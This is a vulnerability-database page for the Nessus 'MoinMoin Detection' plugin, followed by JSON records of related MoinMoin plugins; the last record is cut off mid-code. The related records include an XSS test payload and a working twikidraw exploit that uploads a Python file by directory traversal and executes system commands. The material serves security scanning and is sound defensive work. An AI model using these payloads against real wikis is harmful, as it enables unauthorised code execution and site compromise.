ID MOINMOIN_DETECT.NASL Type nessus Reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-03-02T00:00:00
Description
The remote host is running MoinMoin, a wiki written in Python.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
  # Registration pass: this branch only declares plugin metadata and then
  # exits, so none of the HTTP probing further down runs from here.

  # Plugin identity and revision bookkeeping.
  script_id(44382);
  script_version("1.4");
  script_cvs_date("Date: 2019/11/22");

  # Title and one-line summary.
  script_name(english:"MoinMoin Detection");
  script_summary(english:"Looks for evidence of MoinMoin");

  # Classification: a remote check tied to the MoinMoin CPE and flagged for
  # asset inventory.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:moinmo:moinmoin");
  script_set_attribute(attribute:"asset_inventory", value:"True");
  script_set_attribute(attribute:"plugin_publication_date",value:"2010/02/02");

  # Report text. This is an informational finding: the risk factor is "None"
  # and there is no remediation ("n/a"); it states presence, not a flaw.
  script_set_attribute(attribute:"synopsis", value:"The remote web server is hosting a wiki written in Python.");
  script_set_attribute(attribute:"description", value:"The remote host is running MoinMoin, a wiki written in Python.");
  script_set_attribute(attribute:"see_also", value:"http://www.moinmo.in/");
  script_set_attribute(attribute:"solution", value:"n/a");
  script_set_attribute(attribute:"risk_factor", value:"None");
  script_end_attributes();

  # Filed as an information-gathering check in the "CGI abuses" family.
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Scheduling constraints: depends on http_version.nasl, is excluded when the
  # "Settings/disable_cgi_scanning" key is set, and needs a web service port
  # (Services/www, or 80).
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
# Pick the web port to examine; 80 is the default passed to the helper.
port = get_http_port(default:80);

# Candidate base paths. The three MoinMoin-specific locations are only added
# when thorough_tests is enabled, so a default scan probes cgi_dirs() alone.
dirs = cgi_dirs();
if (thorough_tests)
  dirs = list_uniq(make_list(dirs, '/wiki', '/moin.cgi', '/moinmoin'));

# Fingerprint for the /SystemInfo page: one pattern for the "MoinMoin Version"
# label and one whose capture group holds the release string.
# NOTE(review): how find_install combines the two sub-lists (presumably both
# must match and the capture becomes the version) is defined in
# webapp_func.inc - confirm there.
# Each pattern is wrapped in its own make_list and assigned by index on
# purpose; do not collapse this into a single make_list call.
regexes = make_list();
regexes[0] = make_list("MoinMoin(<\/a>)? Version<");
regexes[1] = make_list("<dd>Release (.+) \[Revision");

checks = make_array();
checks["/SystemInfo"] = regexes;

# Detection relies entirely on /SystemInfo being served to the scanner. A wiki
# that restricts or removes that page would not match, so a missing finding
# is not proof that MoinMoin is absent; the release string, when captured, is
# whatever the application reports about itself.
installs = find_install(
  port    : port,
  dirs    : dirs,
  checks  : checks,
  appname : "moinmoin"
);

# No match in any candidate directory: record "not installed" via audit().
# NOTE(review): audit() presumably terminates the script here - confirm in
# audit.inc.
if (isnull(installs))
{
  audit(AUDIT_WEB_APP_NOT_INST, "MoinMoin", port);
}

# Emit an informational note; the install listing is attached only when the
# report verbosity is above zero.
if (report_verbosity > 0)
{
  security_note(
    port  : port,
    extra : get_install_report(
      display_name : "MoinMoin",
      installs     : installs,
      port         : port
    )
  );
}
else
{
  security_note(port);
}
{"naslFamily": "CGI abuses", "id": "MOINMOIN_DETECT.NASL", "lastseen": "2021-03-01T04:08:04", "viewCount": 440, "bulletinFamily": "scanner", "cpe": ["cpe:/a:moinmo:moinmoin"], "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 21, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["MOINMOIN_COOKIE_ID.NASL", "MOINMOIN_TWIKIDRAW_CODE_EXEC.NASL", "MOINMOIN_PAGEEDITOR_XSS.NASL", "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "MOINMOIN_1_9_6.NASL", "MOINMOIN_RSSLINK_XSS.NASL"]}], "modified": "2021-03-01T04:08:04", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-03-01T04:08:04", "rev": 2}, "vulnersScore": -0.3}, "type": "nessus", "description": "The remote host is running MoinMoin, a wiki written in Python.", "title": "MoinMoin Detection", "cvelist": [], "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44382);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_name(english:\"MoinMoin Detection\");\n script_summary(english:\"Looks for evidence of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is hosting a wiki written in Python.\");\n script_set_attribute(attribute:\"description\", value:\"The remote host is running MoinMoin, a wiki written in Python.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.moinmo.in/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_set_attribute(attribute:\"asset_inventory\", value:\"True\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ndirs = cgi_dirs();\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/wiki', '/moin.cgi', '/moinmoin');\n dirs = list_uniq(dirs);\n}\n\nchecks = make_array();\n\nregexes = make_list();\nregexes[0] = make_list(\"MoinMoin(<\\/a>)? Version<\");\nregexes[1] = make_list(\"<dd>Release (.+) \\[Revision\");\nchecks[\"/SystemInfo\"] = regexes;\n\ninstalls = find_install(\n appname : \"moinmoin\",\n checks : checks,\n dirs : dirs,\n port : port\n);\nif (isnull(installs)) audit(AUDIT_WEB_APP_NOT_INST, \"MoinMoin\", port);\n\nreport = NULL;\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : \"MoinMoin\",\n installs : installs,\n port : port\n );\n security_note(port:port, extra:report);\n}\nelse security_note(port);\n\n", "published": "2010-02-02T00:00:00", "pluginID": "44382", "references": ["http://www.moinmo.in/"], "reporter": "This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "modified": "2021-03-02T00:00:00", "href": "https://www.tenable.com/plugins/nessus/44382", "scheme": null}
{"nessus": [{"lastseen": "2021-01-20T12:09:09", "description": "The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the 'page_name' parameter when creating\nan rss link. An attacker may be able to leverage this issue to inject\narbitrary HTML and script code into a user's browser to be executed\nwithin the security context of the affected site. \n\nNote that the application is also reportedly affected by a directory\ntraversal vulnerability (CVE-2012-6080) as well as a remote code\nexecution vulnerability (CVE-2012-6081). Nessus has not, however,\ntested for these additional issues.", "edition": 25, "published": "2013-02-28T00:00:00", "title": "MoinMoin rsslink() Function page_name Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-02-28T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_RSSLINK_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/64931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64931);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6082\");\n script_bugtraq_id(57089);\n\n script_name(english:\"MoinMoin rsslink() Function page_name Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server is affected by a cross-\nsite scripting vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the 'page_name' parameter when creating\nan rss link. 
An attacker may be able to leverage this issue to inject\narbitrary HTML and script code into a user's browser to be executed\nwithin the security context of the affected site. \n\nNote that the application is also reportedly affected by a directory\ntraversal vulnerability (CVE-2012-6080) as well as a remote code\nexecution vulnerability (CVE-2012-6081). Nessus has not, however,\ntested for these additional issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\nxss_test = '\"><script>alert(\"' + (SCRIPT_NAME - \".nasl\") + '-' + unixtime() +\n '\")</script>';\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + \"/\" + xss_test,\n port : port,\n exit_on_fail : TRUE,\n fetch404 : TRUE\n);\n\nif (\n \">MoinMoin Powered</a>\" >< res[2] &&\n xss_test + '\" href=\"' >< res[2]\n)\n{\n output = extract_pattern_from_resp(string:res[2], pattern:'ST:'+xss_test);\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following URL :' +\n '\\n' +\n '\\n' + install_url + xss_test +\n '\\n';\n if (report_verbosity > 1)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report +=\n '\\n' + 'This produced the following response :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:09:08", "description": "According to its version number, the MoinMoin install hosted on the\nremote web server is affected by multiple vulnerabilities:\n\n - Versions 1.9.3 up to 1.9.5 are affected by a directory\n traversal vulnerability because the _do_attachment_move\n action in 'AttachFile.py' does not properly sanitize\n user-supplied input. 
This could allow an\n unauthenticated, remote attacker to upload and\n overwrite arbitrary files on the remote host.\n (CVE-2012-6080)\n\n - Versions 1.9.x up to 1.9.5 are affected by a remote\n code execution vulnerability because the 'twikidraw.py'\n action fails to properly sanitize user-supplied input.\n A remote, unauthenticated attacker could utilize a\n specially crafted request using directory traversal\n style characters to upload a file containing arbitrary\n code to the remote host. An attacker could then execute\n the code with the privileges of the user that runs the\n MoinMoin process. (CVE-2012-6081)\n\n - Version 1.9.5 is affected by a cross-site scripting\n (XSS) vulnerability because the application fails to\n properly sanitize user-supplied input in the 'page_name'\n parameter when creating an rss link. An attacker could\n leverage this issue to inject arbitrary HTML and script\n code into a user's browser to be executed within the\n security context of the affected site. 
(CVE-2012-6082)\n\n - Versions < 1.9.x are not maintained by MoinMoin\n developers and should be considered vulnerable.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2013-02-28T00:00:00", "title": "MoinMoin < 1.9.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-02-28T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_1_9_6.NASL", "href": "https://www.tenable.com/plugins/nessus/64930", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64930);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_bugtraq_id(\n 57076,\n 57082,\n 57089,\n 57147\n );\n\n script_name(english:\"MoinMoin < 1.9.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the MoinMoin install hosted on the\nremote web server is affected by multiple vulnerabilities:\n\n - Versions 1.9.3 up to 1.9.5 are affected by a directory\n traversal vulnerability because the _do_attachment_move\n action in 'AttachFile.py' does not properly sanitize\n user-supplied input. 
This could allow an\n unauthenticated, remote attacker to upload and\n overwrite arbitrary files on the remote host.\n (CVE-2012-6080)\n\n - Versions 1.9.x up to 1.9.5 are affected by a remote\n code execution vulnerability because the 'twikidraw.py'\n action fails to properly sanitize user-supplied input.\n A remote, unauthenticated attacker could utilize a\n specially crafted request using directory traversal\n style characters to upload a file containing arbitrary\n code to the remote host. An attacker could then execute\n the code with the privileges of the user that runs the\n MoinMoin process. (CVE-2012-6081)\n\n - Version 1.9.5 is affected by a cross-site scripting\n (XSS) vulnerability because the application fails to\n properly sanitize user-supplied input in the 'page_name'\n parameter when creating an rss link. An attacker could\n leverage this issue to inject arbitrary HTML and script\n code into a user's browser to be executed within the\n security context of the affected site. 
(CVE-2012-6082)\n\n - Versions < 1.9.x are not maintained by MoinMoin\n developers and should be considered vulnerable.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-6080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_require_keys(\"www/moinmoin\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\nversion = install[\"ver\"];\ninstall_url = build_url(qs:dir, port:port);\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"MoinMoin\", install_url);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n# Versions less than 1.9.6 are vulnerable\n# http://moinmo.in/SecurityFixes notes that versions < 1.9.x are no longer\n# maintained and should be considered vulnerable\nif (\n ver[0] < 1 ||\n (ver[0] == 1 && ver[1] < 9) ||\n (ver[0] == 1 && ver[1] == 9 && ver[2] < 6)\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 1.9.6\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url, version);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the twikidraw (action/twikidraw.py)\naction. A remote, unauthenticated attacker could utilize a specially\ncrafted request using directory traversal style characters to upload a\nfile containing arbitrary code to the remote host. 
An attacker could\nthen execute the code with the privileges of the user that runs the\nMoinMoin process. Successful exploitation requires that the MoinMoin\nplugin directory has write permission set for the MoinMoin server user. \n\nNote that the 'anywikidraw' action is reportedly also affected by the\ndirectory traversal and code execution vulnerabilities. The application\nis also reportedly affected by an additional directory traversal\nvulnerability in the action/AttachFile.py script (CVE-2012-6080) as well\nas a cross-site scripting (XSS) vulnerability when creating an rss link\n(CVE-2012-6082). Nessus has not, however, tested for these additional\nissues.", "edition": 27, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-01-21T00:00:00", "title": "MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-21T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_TWIKIDRAW_CODE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/63638", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63638);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6081\", \"CVE-2012-6495\");\n script_bugtraq_id(57082, 57147);\n script_xref(name:\"EDB-ID\", value:\"25304\");\n\n script_name(english:\"MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite\");\n script_summary(english:\"Attempts to execute arbitrary code\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server is affected by a code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The MoinMoin install hosted on the remote web server fails to properly\nsanitize user-supplied input in the twikidraw (action/twikidraw.py)\naction. A remote, unauthenticated attacker could utilize a specially\ncrafted request using directory traversal style characters to upload a\nfile containing arbitrary code to the remote host. An attacker could\nthen execute the code with the privileges of the user that runs the\nMoinMoin process. Successful exploitation requires that the MoinMoin\nplugin directory has write permission set for the MoinMoin server user. \n\nNote that the 'anywikidraw' action is reportedly also affected by the\ndirectory traversal and code execution vulnerabilities. The application\nis also reportedly affected by an additional directory traversal\nvulnerability in the action/AttachFile.py script (CVE-2012-6080) as well\nas a cross-site scripting (XSS) vulnerability when creating an rss link\n(CVE-2012-6082). Nessus has not, however, tested for these additional\nissues.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/SecurityFixes/CVE-2012-6081\");\n # http://www.h-online.com/security/news/item/Hackers-gain-access-to-all-edu-domains-1858471.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f8ddc57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.9.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-6495\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_require_keys(\"www/moinmoin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname:\"moinmoin\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(qs:dir, port:port);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\n\n# Check permissions on WikiSandBox page\nres = http_send_recv3(\n method : \"GET\",\n item : dir + \"/WikiSandBox\",\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"Edit (Text)\" >!< res[2] || \"Edit (GUI)\" >!< res[2])\n exit(0, \"Authentication is required to test the\" + \"MoinMoin install at \" + install_url + \".\");\n\n# Grab a ticket hash needed for the exploit\nurl = \"/WikiSandBox?action=twikidraw&do=modify&target=../../../../data/plugin/action/nessus.py\";\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n);\n\n# Versions 1.9.x < 1.9.2 do not use a ticket hash\n# Versions 1.9.2 and up do require this value\npat = \"&ticket=(.+)&\";\nmatch = eregmatch(pattern:pat, string:res[2]);\nif (!isnull(match)) ticket = match[1];\nelse ticket = \"\";\n\n# Check for escaping in versions >= 1.9.6 which indicate a non-affected instance\npat2 = 'param name=\"basename\" value=\"(.._)+';\nmatch2 = eregmatch(pattern:pat2, 
string:res[2]);\nif (!isnull(match2))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n\n# variables for our loop\nvuln = FALSE;\nvuln2 = FALSE;\n\nforeach cmd (cmds)\n{\n script = (SCRIPT_NAME - \".nasl\");\n script = str_replace(string:script, find:\"_\", replace:\"\");\n exp_script = script + unixtime() + \".py\";\n\n # Define our exploits\n # Unix exploit\n unix_exploit = '--89692781418184\\nContent-Disposition: form-data;' +\n ' name=\"filename\"\\n\\ndrawing.r if()else[]\\nimport os\\ndef execute(p,r):' +\n 'exec\"print>>r,os\\\\56popen(' + \"'\" + cmd + \"&&pwd'\" + \")\\56read()\" +\n '\"\\n--89692781418184\\nContent-Disposition: form-data; name=\"filepath\"; ' +\n 'filename=\"drawing.png\"\\nContent-Type: image/png\\n\\nMoinMoin error' +\n '\\n\\n--89692781418184--';\n\n # Windows exploit\n win_exploit = '--89692781418184\\nContent-Disposition: form-data; ' +\n 'name=\"filename\"\\n\\n\"\\n--89692781418184\\nContent-Disposition: form-data;' +\n ' name=\"filepath\"; filename=\"drawing.png\"\\nContent-Type: image/png\\n\\n' +\n 'MoinMoin error\\ndrawing.r if()else[]\\nimport os\\ndef execute(p,r):exec\"' +\n 'print>>r,os\\\\56popen(' + \"'\" + cmd + \"&& dir'\" + \")\\56read()\" +\n '\"\\n\\n--89692781418184--';\n\n if (cmd == 'id') exploit = unix_exploit;\n else exploit = win_exploit;\n\n # Upload our file\n url = \"?action=twikidraw&do=save&ticket=\" + ticket +\n \"&target=../../../../data/plugin/action/\" + exp_script;\n\n res = http_send_recv3(\n method : \"POST\",\n item : dir + \"/WikiSandBox\" + url,\n add_headers : make_array(\"Content-Type\",\n \"multipart/form-data; boundary=89692781418184\"),\n data : exploit,\n port : port,\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n upload = res[2];\n\n # Test code execution with our uploaded file\n check_url = \"/WikiSandBox?action=\" + (exp_script - \".py\");\n res = http_send_recv3(\n method : \"GET\",\n item : dir + check_url,\n port : port,\n exit_on_fail : TRUE\n 
);\n\n # Extract path for reporting. /data/plugin/action is where upload will reside\n if (cmd == 'id')\n {\n get_path = strstr(res[2], \"/\");\n get_up_path = chomp(get_path) + \"/data/plugin/action/\" + script + \"*\";\n\n output = strstr(res[2], \"uid\") - get_path;\n }\n else\n {\n get_path = strstr(res[2], \"Volume in drive\");\n get_dir = egrep(pattern:\"Directory of (.+)\", string:get_path);\n get_up_path = chomp((get_dir - \" Directory of \")) + \"\\data\\plugin\\action\\\"+\n script + \"*\";\n\n output = strstr(res[2], \"Windows IP\") - get_path;\n }\n\n match = egrep(pattern:cmd_pats[cmd], string:res[2]);\n\n\n # For CGI installs, plugins are activated on the next request\n if (match)\n {\n vuln = TRUE;\n break;\n }\n # For the standalone or twisted servers, plugins are activated after\n # restarting the MoinMoin server.\n # For FastCGI and mod_python, Apache needs a restart for exploit to work.\n else if (\n (isnull(upload)) &&\n (!vuln) &&\n (\"<h1>Unhandled Exception</h1>\" >!< res[2])\n )\n {\n vuln2 = TRUE;\n break;\n }\n}\n\n# Exit if upload and/or attack fail\nif ((!vuln) && (!vuln2))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"MoinMoin\", install_url);\n\n# Reporting\nif (report_verbosity > 0)\n{\n snip = crap(data:\"-\", length:30)+' snip '+ 